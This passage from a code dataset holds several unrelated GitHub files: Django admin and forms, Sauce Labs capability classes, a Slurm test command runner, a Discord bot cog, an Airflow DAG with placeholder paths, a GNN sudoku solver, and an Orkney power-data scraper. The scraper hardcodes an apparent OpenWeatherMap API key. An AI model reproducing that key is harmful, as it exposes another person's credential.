IncrementerAdmin)\n_register(models.KarmaLog, 
KarmaLogAdmin)\n_register(models.LdapLink, LdapLinkAdmin)\n_register(models.MailQueue, MailQueueAdmin)\n_register(models.MetaDataProperties, MetaDataPropertiesAdmin)\n_register(models.MetaDataValues, MetaDataValuesAdmin)\n_register(models.PassiveAnalyticsStatus, PassiveAnalyticsStatusAdmin)\n_register(models.PassiveLog, PassiveLogAdmin)\n_register(models.PassiveProfileAOI, PassiveProfileAOIAdmin)\n_register(models.PassiveProfileLog, PassiveProfileLogAdmin)\n_register(models.PaymentGateway, PaymentGatewayAdmin)\n_register(models.Redirect, RedirectAdmin)\n_register(models.Replacements, ReplacementsAdmin)\n_register(models.Search, SearchAdmin)\n_register(models.Settings, SettingsAdmin)\n_register(models.Shipper, ShipperAdmin)\n_register(models.ShopCredit, ShopCreditAdmin)\n_register(models.Sku, SkuAdmin)\n_register(models.Snippet, SnippetAdmin)\n_register(models.TaxDriver, TaxDriverAdmin)\n_register(models.TaxEuVatNumbers, TaxEuVatNumbersAdmin)\n_register(models.TaxGenericRates, TaxGenericRatesAdmin)\n_register(models.Template, TemplateAdmin)\n_register(models.TemplateAttachments, TemplateAttachmentsAdmin)\n_register(models.TransactionItem, TransactionItemAdmin)\n_register(models.UserLoginLog, UserLoginLogAdmin)\n_register(models.UserProfileCategory, UserProfileCategoryAdmin)\n_register(models.UserProfileData, UserProfileDataAdmin)\n_register(models.UserProfileField, UserProfileFieldAdmin)\n_register(models.UserSession, UserSessionAdmin)\n_register(models.UserSessionScratch, UserSessionScratchAdmin)\n_register(models.Userpref, UserprefAdmin)\n_register(models.User, UserAdmin)\n_register(models.UsersSpecialState, UsersSpecialStateAdmin)\n_register(models.Vendor, VendorAdmin)\n_register(models.WebguiVersion, WebguiVersionAdmin)\n_register(models.Wobject, WobjectAdmin)\n","repo_name":"wolph/dinner","sub_path":"koornbeurs/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":66498,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20333925653","text":"from django import forms\nfrom .models import Post\n\nclass PostForm(forms.ModelForm):\n title = forms.CharField(label='Заголовок', max_length=20)\n category_post = forms.CharField(label='Категория')\n class Meta:\n model = Post\n fields = [\n 'title',\n 'category_post',\n ]\n\nclass PostCreate(forms.ModelForm):\n title = forms.CharField(label='Заголовок', max_length=20)\n\n class Meta:\n model = Post\n fields = [\n 'title',\n 'text',\n 'author',\n ]\n\n labels = {'text': 'Текст', 'author': 'Автор'}\n\n\n\n\n\n\n\n","repo_name":"Sergo0196/NewsPortal","sub_path":"HomeWork/NewsPortal/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7189601014","text":"from __future__ import annotations\n\nimport dataclasses\nimport enum\nfrom dataclasses import dataclass\nfrom typing import Any, Dict, Iterator, List, Optional, Sequence, Union\n\nfrom pytest_sosu.logging import get_struct_logger\nfrom pytest_sosu.utils import (\n ImmutableDict,\n convert_snake_case_to_camel_case,\n try_one_of,\n try_one_of_or_none,\n)\nfrom pytest_sosu.webdriver.compat import selenium_version\nfrom pytest_sosu.webdriver.platforms import Browser, Platform\n\nlogger = get_struct_logger(__name__)\n\n\nclass SauceTestResultsVisibility(enum.Enum):\n PUBLIC = \"public\"\n PUBLIC_RESTRICTED = \"public restricted\"\n SHARE = \"share\"\n TEAM = \"team\"\n PRIVATE = \"private\"\n\n\n# 
pylint: disable=too-many-instance-attributes\n@dataclass(frozen=True)\nclass SauceOptions:\n name: Optional[str] = None\n build: Optional[str] = None\n tags: Optional[List[str]] = None\n username: Optional[str] = None\n access_key: Optional[str] = None\n custom_data: Optional[Dict[str, Any]] = None\n visibility: Optional[SauceTestResultsVisibility] = None\n tunnel_name: Optional[str] = None\n tunnel_identifier: Optional[str] = None\n tunnel_owner: Optional[str] = None\n parent_tunnel: Optional[str] = None\n record_video: Optional[bool] = None\n video_upload_on_pass: Optional[bool] = None\n record_screenshots: Optional[bool] = None\n record_logs: Optional[bool] = None\n max_duration: Optional[int] = None\n idle_timeout: Optional[int] = None\n command_timeout: Optional[int] = None\n screen_resolution: Optional[str] = None\n extras: ImmutableDict[str, Any] = dataclasses.field(\n default_factory=lambda: ImmutableDict({}),\n )\n\n auto_include_selenium_version: Optional[bool] = None\n\n TO_DICT_AUTO_EXCLUDES = (\n \"custom_data\",\n \"visibility\",\n \"auto_include_selenium_version\",\n \"extras\",\n )\n\n @classmethod\n def default(cls) -> SauceOptions:\n return cls()\n\n def __structlog__(self):\n return self.to_dict()\n\n def merge(self, other: SauceOptions) -> SauceOptions:\n kwargs: Dict[str, Any] = {}\n for field in dataclasses.fields(self):\n name = field.name\n if name == \"extras\":\n continue\n kwargs[name] = self._merge_field(other, name)\n kwargs[\"extras\"] = self.extras.merge(other.extras)\n new_opts = SauceOptions(**kwargs)\n return new_opts\n\n def _merge_field(self, other, name):\n return try_one_of_or_none(\n getattr(other, name),\n lambda: getattr(self, name),\n )\n\n def to_dict(\n self, auto_include_selenium_version: Optional[bool] = None\n ) -> Dict[str, Union[str, int, float]]:\n auto_include_selenium_version = try_one_of(\n auto_include_selenium_version,\n lambda: self.auto_include_selenium_version,\n default=False,\n )\n\n data: Dict[str, Any] = {}\n if auto_include_selenium_version and selenium_version:\n data[\"seleniumVersion\"] = selenium_version\n for field in dataclasses.fields(self):\n name = field.name\n if name in self.TO_DICT_AUTO_EXCLUDES:\n continue\n value = getattr(self, name)\n if value is None:\n continue\n dict_name = convert_snake_case_to_camel_case(name)\n data[dict_name] = value\n if self.custom_data is not None:\n data[\"custom-data\"] = self.custom_data\n if self.visibility is not None:\n data[\"public\"] = self.visibility.value\n data.update(self.extras)\n return data\n\n\n@dataclass(frozen=True)\nclass Capabilities:\n browser: Optional[Browser] = Browser.default()\n platform: Optional[Platform] = Platform.default()\n sauce_options: SauceOptions = SauceOptions.default()\n extras: ImmutableDict[str, Any] = dataclasses.field(\n default_factory=lambda: ImmutableDict({}),\n )\n\n w3c_mode: Optional[bool] = None\n\n @property\n def slug(self):\n if self.browser is None and self.platform is None:\n return \"default\"\n if self.platform is None:\n return self.browser.slug\n if self.browser is None:\n return self.platform.slug\n return f\"{self.browser.slug}-on-{self.platform.slug}\"\n\n def __structlog__(self):\n return self.to_dict()\n\n def merge(self, other: Capabilities) -> Capabilities:\n new_caps = Capabilities(\n browser=try_one_of_or_none(other.browser, lambda: self.browser),\n platform=try_one_of_or_none(other.platform, lambda: self.platform),\n sauce_options=self.sauce_options.merge(other.sauce_options),\n 
extras=self.extras.merge(other.extras),\n w3c_mode=try_one_of_or_none(other.w3c_mode, lambda: self.w3c_mode),\n )\n return new_caps\n\n def to_dict(\n self,\n w3c_mode: Optional[bool] = None,\n auto_include_selenium_version: Optional[bool] = None,\n ) -> Dict[str, Any]:\n w3c_mode = try_one_of(w3c_mode, lambda: self.w3c_mode, default=True)\n\n data: Dict[str, Any] = {}\n if w3c_mode:\n data.update(\n {\n \"sauce:options\": {},\n }\n )\n if self.platform is not None:\n data.update(\n {\n \"platformName\": self.platform.full_name,\n }\n )\n if self.browser is not None:\n data.update(\n {\n \"browserName\": self.browser.name,\n \"browserVersion\": self.browser.version,\n }\n )\n else:\n if self.platform is not None:\n data.update(\n {\n \"platform\": self.platform.full_name,\n }\n )\n if self.browser is not None:\n data.update(\n {\n \"browserName\": self.browser.name,\n \"version\": self.browser.version,\n }\n )\n\n sauce_options_data = data[\"sauce:options\"] if w3c_mode else data\n sauce_options_data.update(\n self.sauce_options.to_dict(\n auto_include_selenium_version=auto_include_selenium_version,\n )\n )\n\n data.update(self.extras)\n\n return data\n\n\n@dataclass(frozen=True)\nclass CapabilitiesMatrix:\n browsers: Optional[List[Browser]] = None\n platforms: Optional[List[Platform]] = None\n sauce_options_list: Optional[List[SauceOptions]] = None\n\n def __structlog__(self) -> Dict[str, Any]:\n return self.to_dict()\n\n def iter_capabilities(self) -> Iterator[Capabilities]:\n browsers: Sequence[Optional[Browser]] = [None]\n if self.browsers is not None:\n browsers = self.browsers\n platforms: Sequence[Optional[Platform]] = [None]\n if self.platforms is not None:\n platforms = self.platforms\n sauce_options_list = (\n [SauceOptions.default()]\n if self.sauce_options_list is None\n else self.sauce_options_list\n )\n for browser in browsers:\n for platform in platforms:\n for sauce_options in sauce_options_list:\n yield Capabilities(\n browser=browser,\n platform=platform,\n sauce_options=sauce_options,\n )\n\n def to_dict(self) -> Dict[str, Any]:\n return dataclasses.asdict(self)\n","repo_name":"apragacz/pytest-sosu","sub_path":"pytest_sosu/webdriver/capabilities.py","file_name":"capabilities.py","file_ext":"py","file_size_in_byte":7676,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"31274411203","text":"import os, shlex, subprocess, sys, time\n\n# SchedMD\nfrom utils.log import (\n log,\n log_new_line,\n)\n\nCMD_HOOK = \"CMD: \"\n\n\n# Run functions with stats\ndef perform(action_desc, function, *args, verbose=True, new_line=False, decor=\"..\"):\n log_func = log\n nl = \"\"\n\n if new_line:\n log_func = log_new_line\n nl = \"\\n\"\n\n # action_desc: ie Cloning Repo, building slurm,\n if verbose:\n log_func(f\"[{decor}{action_desc}{decor}]{nl}\")\n\n start = time.perf_counter()\n result = function(*args)\n finish = time.perf_counter()\n time_stat = round(finish - start, 2)\n\n if verbose:\n log_func(f\"[{decor}{action_desc}{decor}] finished in {time_stat} seconds\")\n\n return result\n\n\ndef run_cmd(cmd, env=None, quiet=False, print_output=False, timeout=None, shell=False):\n if not quiet:\n log(CMD_HOOK + cmd)\n\n # If shell is specified, then let the shell split and parse the cmd string\n if not shell:\n cmd = shlex.split(cmd)\n\n if print_output:\n std_out = sys.stdout\n std_err = sys.stderr\n else:\n std_out = subprocess.PIPE\n std_err = subprocess.PIPE\n\n output = subprocess.run(\n cmd,\n env=env,\n stdout=std_out,\n 
stderr=std_err,\n timeout=timeout,\n shell=shell,\n text=True,\n )\n\n if (\n not quiet\n and not print_output\n and output.returncode != 0\n and output.stderr != \"\"\n ):\n log(\"Error: %s\" % output.stderr)\n\n # Access rc from output elsewhere with output.returncode\n return output\n\n\ndef run_cmd_or_exit(\n cmd, msg, rc=0, quiet=False, print_output=False, timeout=None, shell=False\n):\n output = run_cmd(\n cmd, quiet=quiet, print_output=print_output, timeout=timeout, shell=shell\n )\n\n if output.returncode != rc:\n log(f\"{msg}\")\n log(f\"'{cmd}' failed with returncode {output.returncode}\")\n log(f\"stderr: {output.stderr}\")\n log(f\"stdout: {output.stdout}\")\n\n sys.exit(\"Exiting\")\n else:\n return output\n","repo_name":"SchedMD/slurm","sub_path":"testsuite/src/lib/utils/cmds.py","file_name":"cmds.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":2074,"dataset":"github-code","pt":"19"} +{"seq_id":"7110757046","text":"import requests\nimport json\nimport time\nimport pyowm\n\nrequest_headers = {\n'accept': 'application/json, text/javascript, */*; q=0.01',\n'referer': 'https://www.ssen.co.uk/ANM/',\n'Sec-Fetch-Mode': 'cors',\n'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36',\n'X-Requested-With': 'XMLHttpRequest'\n}\n\n# api key using OpenWeatherMap\nowm = pyowm.OWM('b3b365b37e36b285df0fc807f8b76c1b')\n# get weather conditions in orkney\nobservation = owm.weather_at_id(2640923)\nw = observation.get_weather()\n\nurl = \"https://www.ssen.co.uk/Sse_Components/Views/Controls/FormControls/Handlers/ActiveNetworkManagementHandler.ashx?action=graph&contentId=14973&_=1571510420656\"\nz = requests.get(url, headers=request_headers)\n\njz = z.json()\nwith open('/root/yf/powerdataset.csv', 'a') as f:\n s = time.asctime(time.localtime()) + ','\n for i in range(5):\n s = s + str(sum(jz['data']['datasets'][i]['data'])) + ','\n s = s + str(w.get_wind()['speed']) + ',' + str(w.get_humidity()) + ',' + str(w.get_temperature('celsius')['temp'])\n s += '\\n'\n f.write(s)\n f.close()\n","repo_name":"wangwenda97/orkneypowerdataset","sub_path":"orkneyspider.py","file_name":"orkneyspider.py","file_ext":"py","file_size_in_byte":1143,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2570913984","text":"import traceback\n\nimport discord, datetime, json, random\nfrom discord.ext import commands\nimport aiohttp, io\nfrom random import randint\nfrom yarl import URL\nimport fast_colorthief\n\nstart_time = datetime.datetime.utcnow()\n\nclass General(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name=\"help\")\n @commands.guild_only()\n async def help(self, ctx):\n dm = ctx.author\n embed=discord.Embed(title=\"Help\", color=discord.Color.green())\n embed.add_field(name=\"Parcility\", value=\"`[[query: package]]`\\n`!package `\\n`!repo `\", inline=False)\n embed.add_field(name=\"Homebrew\", value=\"`{{query: package/application}}`\\n`!brew `\\n`!cask `\", inline=False)\n embed.add_field(name=\"IPSW Downloads\", value=\"`!firmware `\", inline=False)\n embed.add_field(name=\"General\", value=\"`!jumbo `\\n`!userinfo [user: mention/id]`\\n`!pfp [user: mention/id]`\\n`!ping`\\n`!cat`\\n`!catgirl`\\n`!catboy`\", inline=False)\n embed.add_field(name=\"Moderation\", value=\"`!purge `\\n`!kick `\\n`!ban `\\n`!unban `\", inline=False)\n embed.add_field(name=\"Source / Invite\", 
value='https://github.com/xstecky/Table-Bot', inline=True)\n embed.add_field(name=\"Discord\", value='https://diatr.us/discord', inline=False)\n\n now = datetime.datetime.utcnow() # Timestamp of when uptime function is run\n delta = now - start_time\n hours, remainder = divmod(int(delta.total_seconds()), 3600)\n minutes, seconds = divmod(remainder, 60)\n days, hours = divmod(hours, 24)\n if days:\n time_format = \"{d} days, {h} hours, {m} minutes, and {s} seconds\"\n else:\n time_format = \"{h} hours, {m} minutes, and {s} seconds\"\n uptime_stamp = time_format.format(d=days, h=hours, m=minutes, s=seconds)\n\n embed.set_footer(text=f'Online for {uptime_stamp}')\n try:\n await dm.send(embed=embed)\n await ctx.send('📬')\n except:\n await ctx.send(embed=embed)\n\n @commands.command(name='jumbo', aliases=['e','enlarge','emoji'])\n @commands.guild_only()\n async def jumbo(self, ctx, emoji: discord.PartialEmoji = None):\n if emoji is None:\n embed = discord.Embed(title=\"Error\", color=discord.Color.red())\n embed.description = f'You must specify an emoji to enlarge!'\n await ctx.message.delete(delay=15)\n await ctx.send(embed=embed, delete_after=15)\n else:\n async with aiohttp.ClientSession() as client:\n async with client.get(URL(str(emoji.url))) as img:\n image_bytes = io.BytesIO(await img.read())\n rgb = fast_colorthief.get_dominant_color(image_bytes, quality=1)\n color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16) \n embed = discord.Embed(title=emoji.name, color=color)\n embed.set_image(url=emoji.url)\n await ctx.send(embed=embed)\n\n @commands.command(name='avatar', aliases=['pfp'])\n @commands.guild_only()\n async def avatar(self, ctx, user: discord.Member = None):\n user = user or ctx.author\n async with aiohttp.ClientSession() as client:\n async with client.get(URL(str(\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.png?size=16\".format(user)))) as img:\n image_bytes = io.BytesIO(await img.read())\n rgb = fast_colorthief.get_dominant_color(image_bytes, quality=1)\n color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16)\n embed = discord.Embed(title=user.display_name, color=color)\n if user.is_avatar_animated():\n embed.add_field(name=\"View as\", value=f'[gif]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.gif?size=1024)\".format(user)} [png]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.png?size=1024)\".format(user)} [jpg]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.jpg?size=1024)\".format(user)} [webp]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.webp?size=1024)\".format(user)}', inline=False)\n else:\n embed.add_field(name=\"View as\", value=f'[png]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.png?size=1024)\".format(user)} [jpg]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.jpg?size=1024)\".format(user)} [webp]({\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.webp?size=1024)\".format(user)}', inline=False)\n embed.set_image(url=user.avatar_url)\n await ctx.send(embed=embed)\n\n @commands.command(name=\"info\", aliases=['userinfo', 'ui'])\n @commands.guild_only()\n async def info(self, ctx, user: discord.Member = None):\n user = user or ctx.author\n roles = \"\"\n if isinstance(user, discord.Member):\n for role in user.roles:\n if role != ctx.guild.default_role:\n roles += role.mention + \" \"\n else:\n roles = \"No roles.\"\n joined = f\"User not in {ctx.guild.name}.\"\n \n async with aiohttp.ClientSession() as client:\n async with 
client.get(URL(str(\"https://cdn.discordapp.com/avatars/{0.id}/{0.avatar}.png\".format(user)))) as img:\n image_bytes = io.BytesIO(await img.read())\n rgb = fast_colorthief.get_dominant_color(image_bytes, quality=1)\n color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16) \n embed=discord.Embed(title=\"User Info\", description=f\"{user.mention} ({user.id})\", color=color)\n embed.add_field(name=\"Created On\", value=user.created_at.strftime(\"%B %d, %Y\"), inline=True)\n embed.add_field(name=\"Joined On\", value=user.joined_at.strftime(\"%B %d, %Y\"), inline=True)\n embed.add_field(name=\"Roles\", value=roles if roles else \"None\", inline=False)\n embed.set_thumbnail(url=user.avatar_url)\n await ctx.send(embed=embed)\n\n @commands.command(name=\"ping\")\n @commands.guild_only()\n async def ping(self, ctx):\n lag = round(self.bot.latency*1000, 1)\n if lag >= 50:\n embed = discord.Embed(title=\"Pong!\", color=discord.Color.red())\n if lag <= 49:\n embed = discord.Embed(title=\"Pong!\", color=discord.Color.green())\n embed.description = f'Latency is {lag} ms.'\n await ctx.send(embed=embed)\n\n @commands.command(name=\"catgirl\")\n @commands.guild_only()\n async def catgirl(self, ctx):\n async with aiohttp.ClientSession() as client:\n async with client.get(URL('https://nekos.life/api/v2/img/neko', encoded=True)) as resp:\n if resp.status == 200:\n response = json.loads(await resp.text())\n image = response.get('url')\n async with aiohttp.ClientSession() as client:\n async with client.get(URL(str(image))) as img:\n image_bytes = io.BytesIO(await img.read())\n rgb = fast_colorthief.get_dominant_color(image_bytes, quality=1)\n color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16) \n embed = discord.Embed(color=color)\n embed.set_image(url=image)\n await ctx.send(embed=embed)\n\n @commands.command(name=\"catboy\")\n @commands.guild_only()\n async def catboy(self, ctx):\n async with aiohttp.ClientSession() as client:\n async with client.get(URL('https://api.catboys.com/img', encoded=True)) as resp:\n if resp.status == 200:\n response = json.loads(await resp.text())\n image = response.get('url')\n async with aiohttp.ClientSession() as client:\n async with client.get(URL(str(image))) as img:\n image_bytes = io.BytesIO(await img.read())\n rgb = fast_colorthief.get_dominant_color(image_bytes, quality=1)\n color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16) \n embed = discord.Embed(color=color)\n embed.set_image(url=image)\n await ctx.send(embed=embed)\n\n #@commands.command(name=\"cat\", aliases=['peepee'])\n #@commands.guild_only()\n #async def cat(self, ctx):\n # photonumber = randint(1, 947)\n # async with aiohttp.ClientSession() as client:\n # async with client.get(URL(str(f\"https://assets.stkc.win/botpeepee/{photonumber}.jpg\"))) as img:\n # image_bytes = io.BytesIO(await img.read())\n # cf = ColorThief(image_bytes)\n # dc = cf.get_color(quality=1)\n # rgb = dc\n # color = int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16) \n # embed = discord.Embed(color=color)\n # embed.set_image(url=f\"https://assets.stkc.win/botpeepee/{photonumber}.jpg\")\n # await ctx.send(embed=embed)\n\n @commands.command(name=\"cat\", aliases=['peepee'])\n @commands.guild_only()\n async def cat(self, ctx):\n try:\n photonumber = randint(1, 947)\n async with aiohttp.ClientSession() as client:\n async with client.get(URL(str(f\"https://assets.stkc.win/botpeepee/{photonumber}.jpg\"))) as img:\n image_bytes = io.BytesIO(await img.read())\n rgb = fast_colorthief.get_dominant_color(image_bytes, quality=1)\n color = 
int(f'{rgb[0]:02x}{rgb[1]:02x}{rgb[2]:02x}', 16) \n embed = discord.Embed(color=color)\n embed.set_image(url=f\"https://assets.stkc.win/botpeepee/{photonumber}.jpg\")\n await ctx.send(embed=embed)\n except Exception as e:\n await ctx.send(e)\n\ndef setup(bot):\n bot.add_cog(General(bot))\n","repo_name":"crystall1nedev/Table-Bot","sub_path":"src/commands/general.py","file_name":"general.py","file_ext":"py","file_size_in_byte":10155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"41016227372","text":"## First Airflow DAG with a scheduler\r\n\r\n## Importing libs and operators:\r\n\r\nfrom airflow import DAG\r\nfrom airflow.operators.bash_operator import BashOperator\r\nfrom airflow.operators.python_operator import PythonOperator\r\nfrom datetime import datetime, timedelta\r\nimport pandas as pd\r\n\r\ndefault_args = {\r\n 'owner': 'Matheus Rodrigues',\r\n 'depends_on_past': False,\r\n 'start_date': datetime(2021, 1, 1), ## placeholder start date\r\n 'email': '', ## emails must be configured in the airflow.cfg file [smtp].\r\n 'email_on_failure': False,\r\n 'email_on_retry': False,\r\n 'retries': 1,\r\n 'retry_delay': timedelta(minutes=1)\r\n}\r\n\r\n## Defining the DAG:\r\n\r\ndag_02 = DAG(\r\n "dag-02",\r\n description="Extracts data from the Titanic database and computes the mean age",\r\n default_args = default_args,\r\n schedule_interval = timedelta(minutes=2)\r\n)\r\n\r\n## Fetching data:\r\n\r\ntask_get_data = BashOperator(\r\n task_id = 'get_data',\r\n bash_command = 'curl {url}',\r\n dag=dag_02\r\n)\r\n\r\n## Defining functions for the PythonOperator:\r\n\r\ndef calculate_mean():\r\n df = pd.read_csv('')\r\n med = df.Age.mean()\r\n return med\r\n\r\ndef print_age(**context):\r\n value = context['task_instance'].xcom_pull(task_ids='calcula_idade_media')\r\n print(f"The mean age was {value} years.")\r\n\r\ntask_idade_media = PythonOperator(\r\n task_id='calcula_idade_media',\r\n python_callable=calculate_mean, ## pass the callable itself; the operator calls it\r\n dag=dag_02\r\n)\r\n\r\ntask_print_idade = PythonOperator(\r\n task_id='mostra-idade',\r\n python_callable = print_age,\r\n provide_context = True,\r\n dag=dag_02\r\n)\r\n\r\n## Task ordering:\r\n\r\ntask_get_data >> task_idade_media >> task_print_idade\r\n","repo_name":"matheusrdr/engenharia-de-dados-igti","sub_path":"primeira_dag_schedulada.py","file_name":"primeira_dag_schedulada.py","file_ext":"py","file_size_in_byte":1606,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"18343123730","text":"import time\nimport torch\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\nfrom torch.utils.data import TensorDataset, DataLoader\n\nimport tools\nimport tests\n\nfrom model import GNN\nfrom data import Sudoku\n\n# plt.rc('figure', max_open_warning = 0)\n\n\nimport argparse\n\nparser = argparse.ArgumentParser(description=\"GNN Sudoku solver\")\nparser.add_argument(\n \"--n_epochs\", default=30, type=int, metavar=\"N\", help=\"number of epochs to run training loop with default = 30\"\n)\n\nparser.add_argument(\n \"-b\", \"--batch_size\", default=16, type=int, metavar=\"N\", help=\"batch size for training with default = 16\"\n)\n\nparser.add_argument(\"--cuda\", dest=\"cuda\", action=\"store_false\", help=\"pass this flag to disable cuda\")\n\nparser.add_argument(\"--skip_training\", dest=\"skip_training\", action=\"store_true\", help=\"skip training\")\n\nparser.add_argument(\"-lr\", \"--learning_rate\", default=0.001, type=float, metavar=\"LR\", 
help=\"learning rate\")\n\n\ndef sudoku_edges():\n\n flatten_puzzle = np.reshape(np.array(range(81)), (9, 9))\n dic = {}\n for vert_index, outer_value in enumerate(flatten_puzzle):\n if vert_index in (0, 3, 6):\n up = 0\n down = 2\n if vert_index in (1, 4, 7):\n up = -1\n down = 1\n if vert_index in (2, 5, 8):\n up = -2\n down = 0\n\n for horz_index, inner_value in enumerate(outer_value):\n if horz_index in (0, 3, 6):\n right = 2\n left = 0\n if horz_index in (1, 4, 7):\n right = 1\n left = -1\n if horz_index in (2, 5, 8):\n right = 0\n left = -2\n\n for i in range(up, down + 1, 1):\n for j in range(left, right + 1, 1):\n if inner_value not in dic:\n dic[inner_value] = []\n if flatten_puzzle[vert_index + i][horz_index + j] != inner_value:\n dic[inner_value].append(flatten_puzzle[vert_index + i][horz_index + j])\n\n for i in outer_value:\n if inner_value != i:\n dic[inner_value].append(i)\n\n for l in flatten_puzzle:\n if inner_value != l[horz_index]:\n dic[inner_value].append(l[horz_index])\n dic[inner_value] = set(dic[inner_value])\n\n src_ids = [[x] * 20 for x in dic.keys()]\n src_ids = torch.Tensor([x for y in src_ids for x in y]).type(torch.LongTensor)\n dst_ids = [y for y in dic.values()]\n\n dst_ids = torch.Tensor([x for y in dst_ids for x in y]).type(torch.LongTensor)\n\n return src_ids, dst_ids\n\n\ndef collate(list_of_samples):\n \"\"\"Merges a list of samples to form a mini-batch.\n\n Args:\n list_of_samples is a list of tuples (inputs, targets),\n inputs of shape (n_nodes, 9): Inputs to each node in the graph. Inputs are one-hot coded digits\n in the sudoku puzzle. A missing digit is encoded with all zeros. n_nodes=81 for the sudoku graph.\n targets of shape (n_nodes): A LongTensor of targets (correct digits in the sudoku puzzle).\n\n Returns:\n inputs of shape (batch_size*n_nodes, 9): Inputs to each node in the graph. Inputs are one-hot coded digits\n in the sudoku puzzle. A missing digit is encoded with all zeros. 
n_nodes=81 for the sudoku graph.\n targets of shape (batch_size*n_nodes): A LongTensor of targets (correct digits in the sudoku puzzle).\n src_ids of shape (batch_size*1620): LongTensor of source node ids for each edge in the large graph.\n The source ids should be between 0 and batch_size * 81.\n dst_ids of shape (batch_size*1620): LongTensor of destination node ids for each edge in the large graph.\n The destination ids should be between 0 and batch_size * 81.\n \"\"\"\n inputs = [tup[0] for tup in list_of_samples]\n inputs = torch.cat(inputs, 0)\n targets = [tup[1] for tup in list_of_samples]\n targets = torch.cat(targets, 0)\n batch = len(list_of_samples)\n src, dst = sudoku_edges()\n src_ids = torch.cat([src + 81 * i for i in range(batch)], 0)\n dst_ids = torch.cat([dst + 81 * i for i in range(batch)], 0)\n return inputs, targets, src_ids, dst_ids\n\n\ndef fraction_of_solved_puzzles(gnn, testloader, device):\n with torch.no_grad():\n n_test = 0\n n_test_solved = 0\n for i, (inputs, targets, src_ids, dst_ids) in enumerate(testloader):\n batch_size = inputs.size(0) // 81\n inputs, targets = inputs.to(device), targets.to(device)\n src_ids, dst_ids = src_ids.to(device), dst_ids.to(device)\n\n outputs = gnn(inputs, src_ids, dst_ids) # [n_iters, batch*n_nodes, 9]\n solution = outputs.view(gnn.n_iters, batch_size, 9, 9, 9)\n\n final_solution = solution[-1].argmax(dim=3).to(device)\n solved = (final_solution.view(-1, 81) == targets.view(batch_size, 81)).all(dim=1)\n n_test += solved.size(0)\n n_test_solved += solved.sum().item()\n return n_test_solved / n_test\n\n\ndef main():\n \"\"\"Train the GNN on sudoku puzzles, then evaluate it on the test set.\"\"\"\n args = parser.parse_args()\n if args.cuda:\n device = torch.device(\"cuda:0\")\n else:\n device = torch.device(\"cpu\")\n\n data_dir = tools.select_data_dir()\n\n trainset = Sudoku(data_dir, train=True)\n testset = Sudoku(data_dir, train=False)\n\n trainloader = DataLoader(trainset, batch_size=args.batch_size, collate_fn=collate)\n testloader = DataLoader(testset, batch_size=args.batch_size, collate_fn=collate)\n\n # Create network\n gnn = GNN(device)\n if not args.skip_training:\n optimizer = torch.optim.Adam(gnn.parameters(), lr=args.learning_rate)\n loss_method = nn.CrossEntropyLoss(reduction=\"mean\")\n\n for epoch in range(args.n_epochs):\n for i, data in enumerate(trainloader, 0):\n inputs, targets, src_ids, dst_ids = data\n inputs, targets = inputs.to(device), targets.to(device)\n src_ids, dst_ids = src_ids.to(device), dst_ids.to(device)\n optimizer.zero_grad()\n gnn.zero_grad()\n output = gnn.forward(inputs, src_ids, dst_ids)\n output = output.to(device)\n output = output.view(-1, output.shape[2])\n targets = targets.repeat(gnn.n_iters, 1) # replicate targets for every message-passing iteration\n targets = targets.view(-1)\n loss = loss_method(output, targets)\n loss.backward()\n optimizer.step()\n\n fraction = fraction_of_solved_puzzles(gnn, testloader, device)\n\n print(\"Train Epoch {}: Loss: {:.6f} Fraction: {}\".format(epoch + 1, loss.item(), fraction))\n\n tools.save_model(gnn, \"7_gnn.pth\")\n else:\n gnn = GNN(device)\n tools.load_model(gnn, \"7_gnn.pth\", device)\n\n # Evaluate the trained model\n # Get graph iterations for some test puzzles\n with torch.no_grad():\n inputs, targets, src_ids, dst_ids = next(iter(testloader))\n inputs, targets = inputs.to(device), targets.to(device)\n src_ids, dst_ids = src_ids.to(device), dst_ids.to(device)\n\n batch_size = inputs.size(0) // 81\n outputs = gnn(inputs, src_ids, dst_ids).to(device) # [n_iters, n_nodes, 9]\n\n solution = outputs.view(gnn.n_iters, batch_size, 9, 9, 9).to(device)\n final_solution = 
